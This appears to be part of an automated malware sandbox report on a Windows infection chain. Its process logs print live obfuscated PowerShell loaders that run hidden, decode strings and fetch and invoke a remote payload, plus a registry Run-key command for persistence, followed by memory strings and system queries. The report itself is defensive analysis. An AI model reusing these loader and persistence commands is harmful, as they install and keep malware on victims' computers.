Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "bilateralities" /t reg_expand_sz /d "%arrestationernes110% -w 1 $faucals83=(get-itemproperty -path 'hkcu:\sttyskers\').talevant;%arrestationernes110% ($faucals83)"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "if (${host}.currentuiculture) {$afgiftskolonners42nchamber='substr';$apocrisiary++;}$afgiftskolonners42nchamber+='ing';function indbandtes($forsimple){$afrettere=$forsimple.length-$apocrisiary;for( $afgiftskolonners42=2;$afgiftskolonners42 -lt $afrettere;$afgiftskolonners42+=3){$nedgangene+=$forsimple.$afgiftskolonners42nchamber.'invoke'( $afgiftskolonners42, $apocrisiary);}$nedgangene;}function sloshily($parasollernes){ & ($paprr) ($parasollernes);}$velproevet=indbandtes 'hemb.o dzm,i.elfil sa u/sc5 p. g0ry n( sw,oi.an.md,to tw.hs . s.ns,tse s1.o0ar.he0ca; h ,ewhji nnki6 .4su;pr tyxbo6,v4g ;ke ulrd v a: ,1 d2 e1ch.pr0di)se ,rgr.e mc ,kb.ofo/se2fe0ca1 b0su0r 1in0s,1r o,fsliinrmue sfduoauxf./l,1zi2ar1r.. u0al ';$hennes=indbandtes ' ,udisepea.rg -gga eg ,ey.nbytb. ';$reveled=indbandtes 'sthf.tsetf.phos.l:po/.o/awa ,vuno,rchyarelofdnao dp.oet r hure.idcnooc.m.r/nejdrofyucos .e ,4ma. .p n bga.>mih.itqttdep os.o:fr/in/r a vs.ogacskapilo,dsoo ,p ,ebers,u.ao enprean.socr.osymfj/ .je,ocouarsvieb 4,d.fap bnb,g , ';$jejune203=indbandtes 'va>in ';$paprr=indbandtes 'b,ip,e hx h ';$gushet='zaristiske';$ansvarsbevidsthed = indbandtes 'foeaac,vhguo e me%coag pj pkudadas t ba,u%,l\lin ,eskgmalc.il.greep.nbrt p.nogn.a bs s he& p& i ,oea,comhb os. ptul ';sloshily (indbandtes ' u$prg glveo.eb a rlgl: .aobrs,n.pi ln cgfoepa=s,( lc emsmdre i./sical fi$s,aabn,as av oaoprlasbub.rea v si udalspothehude .dri) c ');sloshily (indbandtes 'co$deg tltaog.bpeaaclsu:mobpalseojeds.s .ksma tmtesunf,oo .rsphunoallm dinsp,=sl$ mr re fveke rlcaev dad.ves.lpu lpiivatpa(ta$dejkoedij.nu ansiefe2ka0 ,3se)hy ');sloshily (indbandtes ' f[monure tc .als.ee .r,hv mi.kc ,e apleoinic,npet,imtoabln.eaapgheetrr t]d.:es: esbreaeckouobr.hisattuybepdrr eo,rt.ao gc no lna h,=le m[fonpae otop. schepac .uberkiiprtbey,cpt.r obutunorec ho ,lf,tshypop xesl]dr:k :s,t slfosb.1ir2to ');$reveled=$blodskamsforholds[0];$lnindeholde= (indbandtes ',o$ g.il sorhblia kln,: ag vn,uachv,oeder.hi.ee .t es =kan.cev.w e-lrou,b ojtre,ocprt tst ybls ttg.e fmkr.slna.e.kt.e.mdw etrbdrcinlsoiajeovngyt');$lnindeholde+=$arninge[1];sloshily ($lnindeholde);sloshily (indbandtes 'fo$ung fn gac,vfleafrraiadeprt,hs s.krhadedealsds enyr,rsge[ag$unhk.e snvgnbre us s]ov= e$guv ,esclmop ,rdroveer.v ecrtsk ');$billardkers=indbandtes 'sa$.vgunn,racovaneu,r oio,ecatlysn,.codcaobrwp.ntel uokoa kdraf ri .lpreme(.j$harneedrvo,efal,nemed b,fo$pag oe mr oms.a ununis.es,sj.) . ';$germanies=$arninge[0];sloshily (indbandtes 'sa$tngsclwhofob ba alc,: ,s .asta,fre r tabrnfrdctemenra4 c=di(s t meflsort.r-stpscaort .hc lu$prgskepyr fmasaman kis.e,esk,)bu ');while (!$saarranden4) {sloshily (indbandtes 'ly$,ugk.lf o sbsuastlfo:ann .oafn.yf.oawevseoa,r ga obeul,ue,r= .$satm.r cunoe t ') ;sloshily $billardkers;sloshily (indbandtes 'mustotp.a,eru.t -bas plmieduetep e g.4tr ');sloshily (indbandtes 'ge$ovgbalu oribanacil h: gs.na	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "if (${host}.currentuiculture) {$afgiftskolonners42nchamber='substr';$apocrisiary++;}$afgiftskolonners42nchamber+='ing';function indbandtes($forsimple){$afrettere=$forsimple.length-$apocrisiary;for( $afgiftskolonners42=2;$afgiftskolonners42 -lt $afrettere;$afgiftskolonners42+=3){$nedgangene+=$forsimple.$afgiftskolonners42nchamber.'invoke'( $afgiftskolonners42, $apocrisiary);}$nedgangene;}function sloshily($parasollernes){ & ($paprr) ($parasollernes);}$velproevet=indbandtes 'hemb.o dzm,i.elfil sa u/sc5 p. g0ry n( sw,oi.an.md,to tw.hs . s.ns,tse s1.o0ar.he0ca; h ,ewhji nnki6 .4su;pr tyxbo6,v4g ;ke ulrd v a: ,1 d2 e1ch.pr0di)se ,rgr.e mc ,kb.ofo/se2fe0ca1 b0su0r 1in0s,1r o,fsliinrmue sfduoauxf./l,1zi2ar1r.. u0al ';$hennes=indbandtes ' ,udisepea.rg -gga eg ,ey.nbytb. ';$reveled=indbandtes 'sthf.tsetf.phos.l:po/.o/awa ,vuno,rchyarelofdnao dp.oet r hure.idcnooc.m.r/nejdrofyucos .e ,4ma. .p n bga.>mih.itqttdep os.o:fr/in/r a vs.ogacskapilo,dsoo ,p ,ebers,u.ao enprean.socr.osymfj/ .je,ocouarsvieb 4,d.fap bnb,g , ';$jejune203=indbandtes 'va>in ';$paprr=indbandtes 'b,ip,e hx h ';$gushet='zaristiske';$ansvarsbevidsthed = indbandtes 'foeaac,vhguo e me%coag pj pkudadas t ba,u%,l\lin ,eskgmalc.il.greep.nbrt p.nogn.a bs s he& p& i ,oea,comhb os. ptul ';sloshily (indbandtes ' u$prg glveo.eb a rlgl: .aobrs,n.pi ln cgfoepa=s,( lc emsmdre i./sical fi$s,aabn,as av oaoprlasbub.rea v si udalspothehude .dri) c ');sloshily (indbandtes 'co$deg tltaog.bpeaaclsu:mobpalseojeds.s .ksma tmtesunf,oo .rsphunoallm dinsp,=sl$ mr re fveke rlcaev dad.ves.lpu lpiivatpa(ta$dejkoedij.nu ansiefe2ka0 ,3se)hy ');sloshily (indbandtes ' f[monure tc .als.ee .r,hv mi.kc ,e apleoinic,npet,imtoabln.eaapgheetrr t]d.:es: esbreaeckouobr.hisattuybepdrr eo,rt.ao gc no lna h,=le m[fonpae otop. schepac .uberkiiprtbey,cpt.r obutunorec ho ,lf,tshypop xesl]dr:k :s,t slfosb.1ir2to ');$reveled=$blodskamsforholds[0];$lnindeholde= (indbandtes ',o$ g.il sorhblia kln,: ag vn,uachv,oeder.hi.ee .t es =kan.cev.w e-lrou,b ojtre,ocprt tst ybls ttg.e fmkr.slna.e.kt.e.mdw etrbdrcinlsoiajeovngyt');$lnindeholde+=$arninge[1];sloshily ($lnindeholde);sloshily (indbandtes 'fo$ung fn gac,vfleafrraiadeprt,hs s.krhadedealsds enyr,rsge[ag$unhk.e snvgnbre us s]ov= e$guv ,esclmop ,rdroveer.v ecrtsk ');$billardkers=indbandtes 'sa$.vgunn,racovaneu,r oio,ecatlysn,.codcaobrwp.ntel uokoa kdraf ri .lpreme(.j$harneedrvo,efal,nemed b,fo$pag oe mr oms.a ununis.es,sj.) . ';$germanies=$arninge[0];sloshily (indbandtes 'sa$tngsclwhofob ba alc,: ,s .asta,fre r tabrnfrdctemenra4 c=di(s t meflsort.r-stpscaort .hc lu$prgskepyr fmasaman kis.e,esk,)bu ');while (!$saarranden4) {sloshily (indbandtes 'ly$,ugk.lf o sbsuastlfo:ann .oafn.yf.oawevseoa,r ga obeul,ue,r= .$satm.r cunoe t ') ;sloshily $billardkers;sloshily (indbandtes 'mustotp.a,eru.t -bas plmieduetep e g.4tr ');sloshily (indbandtes 'ge$ovg	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "if (${host}.currentuiculture) {$alismataceae='substr';$lotah++;}$alismataceae+='ing';function viscometres($rubellosis){$overdaadigt=$rubellosis.length-$lotah;for( $dekanterendes=2;$dekanterendes -lt $overdaadigt;$dekanterendes+=3){$firblads159+=$rubellosis.$alismataceae.'invoke'( $dekanterendes, $lotah);}$firblads159;}function tilfredsstillelse($konerne){ . ($hemibasidiomycetes) ($konerne);}$annegretes=viscometres 'bumvio.lznyiefl,ilprapr/sn5te.fr0f ,l(gaw ti.anspds o,aw asfi h n atas z1,a0sy.ud0bi;bi tpw ,iopnv,6te4 c; r bix p6ud4ng; ,trunv ,: .1sk2,r1,l.di0va),n ,gpre .cskk og,/sm2fa0r.1ug0 .0ap1so0 r1ge vefs.isar destfrioraxku/ 1 p2,h1os. .0 , ';$milieuplanerne=viscometres 'youveslreterpr-w a,rgrhe,yn,ct.u ';$bageriers=viscometres 'enhfotant p l:re/.l/ilcn.p.oajuns.e lc.-sma ndd.m ,iopnt.h uopesf t e..fcu.okom.a/des ptn emevchnsts t1ta7 c9si.r myoiaux.o ';$arish=viscometres 'se>re ';$hemibasidiomycetes=viscometres 'amigeeprxud ';$svaerd='incisal';$dekanterendesndoneser = viscometres 'w,er,cexh eoch f %reainpcap dl ap,tu.amo%h.\chblie.olasi un sdtoade1ch0 .3 .xoetofint,t ,&co& s semec ehs.o,i gltuf ';tilfredsstillelse (viscometres 'me$.ig olbloedbgua.lld,:hisett mo ans.e er.foniolate = s(arctym.edwl m / rc u k$ ndd,e ,k gakanefti eoprt.e onoudhne.ostan,idpuo,on lekes ienurls),f ');tilfredsstillelse (viscometres 'ta$ovg klspokrbs aunl ,:jol ieh v de draneyed teresbo=i.$ kbzia vgreer,r,ei eepyr eshy.trst,perl.aitat,e( .$,oa .rraienssch o)ph ');tilfredsstillelse (viscometres 't,[jon lekrt.n.vas e ur v,oisic .ecap,co ki .nkntd,mfiacrn cavagase err ] e:de:,os eafchaufrrf ientprytaplirbeomet sopecm.o.il k es=m ,d[ onste .tsj. ,safen,ckrut r tiuntcoysopskr aot t ohjc ao,glbotfiybrpq e.e] c:va:u.t ,ls.s f1,r2.r ');$bageriers=$leveredes[0];$varmeslangens= (viscometres 'cu$dig wl dop.bskaval :uilc.igeg eansinto,istl ml ii snsugfieb,r.nnf.e lsda=dinenep wan-wooskb tjb,eq,cm.t ps.ayhus nt.le smdi.hinchecotfo.nowexespb.mct,l tiemedin dt');$varmeslangens+=$stoneroot[1];tilfredsstillelse ($varmeslangens);tilfredsstillelse (viscometres 'or$ ol gi bgr,eg,szit cibrl.ul ,it.nmigklenorfonune s r.glhree dapeddie,orbls.f[af$kompaifeltri se ,u sp flora.unste fr,kn .e,a]go=me$mea bn,kn ,e pghir kegat defesje ');$mosegrundene=viscometres ' e$ .lk.i.rg sevus,etgii,olp lnei ,ngeg,oemyrlindrenas o.fld noalwinnsulhyokrau.dspfski pls ekr(kr$ ,bfua cgbnefirreiste,trhesbr,,r$ber kefoh ,ararlidine ,nfu) d ';$reharden=$stoneroot[0];tilfredsstillelse (viscometres ',e$ g .lmoo db ,aenl r: hfshu oshaitioean bs.dar,amer.te hndreno=vi(,ytwievrsf t - .p sa.mt mh s .o$svr mepuhbra orredspeunnre) a ');while (!$fusionsaarene) {tilfredsstillelse (viscometres 'af$.ogemlreo sbuna ,lls: inbrobon osbioprlreupeb.nlclyfr=c.$mitrarlau ek ') ;tilfredsstillelse $mosegrundene;tilfredsstillelse (viscometres 'uns tt ma.ir rt a- tspils etrefap v ,	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "if (${host}.currentuiculture) {$alismataceae='substr';$lotah++;}$alismataceae+='ing';function viscometres($rubellosis){$overdaadigt=$rubellosis.length-$lotah;for( $dekanterendes=2;$dekanterendes -lt $overdaadigt;$dekanterendes+=3){$firblads159+=$rubellosis.$alismataceae.'invoke'( $dekanterendes, $lotah);}$firblads159;}function tilfredsstillelse($konerne){ . ($hemibasidiomycetes) ($konerne);}$annegretes=viscometres 'bumvio.lznyiefl,ilprapr/sn5te.fr0f ,l(gaw ti.anspds o,aw asfi h n atas z1,a0sy.ud0bi;bi tpw ,iopnv,6te4 c; r bix p6ud4ng; ,trunv ,: .1sk2,r1,l.di0va),n ,gpre .cskk og,/sm2fa0r.1ug0 .0ap1so0 r1ge vefs.isar destfrioraxku/ 1 p2,h1os. .0 , ';$milieuplanerne=viscometres 'youveslreterpr-w a,rgrhe,yn,ct.u ';$bageriers=viscometres 'enhfotant p l:re/.l/ilcn.p.oajuns.e lc.-sma ndd.m ,iopnt.h uopesf t e..fcu.okom.a/des ptn emevchnsts t1ta7 c9si.r myoiaux.o ';$arish=viscometres 'se>re ';$hemibasidiomycetes=viscometres 'amigeeprxud ';$svaerd='incisal';$dekanterendesndoneser = viscometres 'w,er,cexh eoch f %reainpcap dl ap,tu.amo%h.\chblie.olasi un sdtoade1ch0 .3 .xoetofint,t ,&co& s semec ehs.o,i gltuf ';tilfredsstillelse (viscometres 'me$.ig olbloedbgua.lld,:hisett mo ans.e er.foniolate = s(arctym.edwl m / rc u k$ ndd,e ,k gakanefti eoprt.e onoudhne.ostan,idpuo,on lekes ienurls),f ');tilfredsstillelse (viscometres 'ta$ovg klspokrbs aunl ,:jol ieh v de draneyed teresbo=i.$ kbzia vgreer,r,ei eepyr eshy.trst,perl.aitat,e( .$,oa .rraienssch o)ph ');tilfredsstillelse (viscometres 't,[jon lekrt.n.vas e ur v,oisic .ecap,co ki .nkntd,mfiacrn cavagase err ] e:de:,os eafchaufrrf ientprytaplirbeomet sopecm.o.il k es=m ,d[ onste .tsj. ,safen,ckrut r tiuntcoysopskr aot t ohjc ao,glbotfiybrpq e.e] c:va:u.t ,ls.s f1,r2.r ');$bageriers=$leveredes[0];$varmeslangens= (viscometres 'cu$dig wl dop.bskaval :uilc.igeg eansinto,istl ml ii snsugfieb,r.nnf.e lsda=dinenep wan-wooskb tjb,eq,cm.t ps.ayhus nt.le smdi.hinchecotfo.nowexespb.mct,l tiemedin dt');$varmeslangens+=$stoneroot[1];tilfredsstillelse ($varmeslangens);tilfredsstillelse (viscometres 'or$ ol gi bgr,eg,szit cibrl.ul ,it.nmigklenorfonune s r.glhree dapeddie,orbls.f[af$kompaifeltri se ,u sp flora.unste fr,kn .e,a]go=me$mea bn,kn ,e pghir kegat defesje ');$mosegrundene=viscometres ' e$ .lk.i.rg sevus,etgii,olp lnei ,ngeg,oemyrlindrenas o.fld noalwinnsulhyokrau.dspfski pls ekr(kr$ ,bfua cgbnefirreiste,trhesbr,,r$ber kefoh ,ararlidine ,nfu) d ';$reharden=$stoneroot[0];tilfredsstillelse (viscometres ',e$ g .lmoo db ,aenl r: hfshu oshaitioean bs.dar,amer.te hndreno=vi(,ytwievrsf t - .p sa.mt mh s .o$svr mepuhbra orredspeunnre) a ');while (!$fusionsaarene) {tilfredsstillelse (viscometres 'af$.ogemlreo sbuna ,lls: inbrobon osbioprlreupeb.nlclyfr=c.$mitrarlau ek ') ;tilfredsstillelse $mosegrundene;tilfredsstillelse (viscometres 'uns tt ma.ir rt a- tspils etrefap v ,
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "bilateralities" /t reg_expand_sz /d "%arrestationernes110% -w 1 $faucals83=(get-itemproperty -path 'hkcu:\sttyskers\').talevant;%arrestationernes110% ($faucals83)"

Source: wab.exe, 0000000A.00000003.2228838836.0000000000B63000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.4221123486.0000000000B62000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager:0ws
Source: wab.exe, 0000000A.00000003.2268500309.0000000000BCC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.4222010144.0000000000BCC000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2269959379.0000000000BCC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: wab.exe, 0000000A.00000002.4244405887.0000000023F41000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000003.2228838836.0000000000B63000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [2024/08/28 08:01:53 Program Manager]
Source: wab.exe, 0000000A.00000002.4222010144.0000000000BCC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager]J@)
Source: wab.exe, 0000000A.00000002.4222010144.0000000000BCC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerPJ=)Z&
Source: wab.exe, 0000000A.00000002.4221123486.0000000000B62000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [2024/08/28 08:02:00 Program Manager]
Source: wab.exe, 0000000A.00000002.4222010144.0000000000BCC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager~J
Source: wab.exe, 0000000A.00000002.4222010144.0000000000BCC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Managerr\|
Source: wab.exe, 0000000A.00000002.4222010144.0000000000BCC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerjJ3)
Source: wab.exe, 0000000A.00000002.4244405887.0000000023F41000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.4221123486.0000000000B62000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [2024/08/28 08:03:39 Program Manager]
Source: wab.exe, 0000000A.00000003.2228838836.0000000000B63000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.4221123486.0000000000B62000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: [%04i/%02i/%02i %02i:%02i:%02i Program Manager]
Source: wab.exe, 0000000A.00000002.4222010144.0000000000BCC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagertX@fn
Source: wab.exe, 0000000A.00000002.4222010144.0000000000BCC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerFJG)t$
Source: wab.exe, 0000000A.00000002.4221123486.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.4221949132.0000000000BB7000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000A.00000002.4244405887.0000000023F2C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \|Program Manager\|
Source: wab.exe, 0000000A.00000002.4222010144.0000000000BCC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager{J")
Source: wab.exe, 0000000A.00000002.4222010144.0000000000BCC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagertK

Contains functionality to query CPU information (cpuid)

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Code function: 10_2_23D72933 cpuid

10_2_23D72933

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
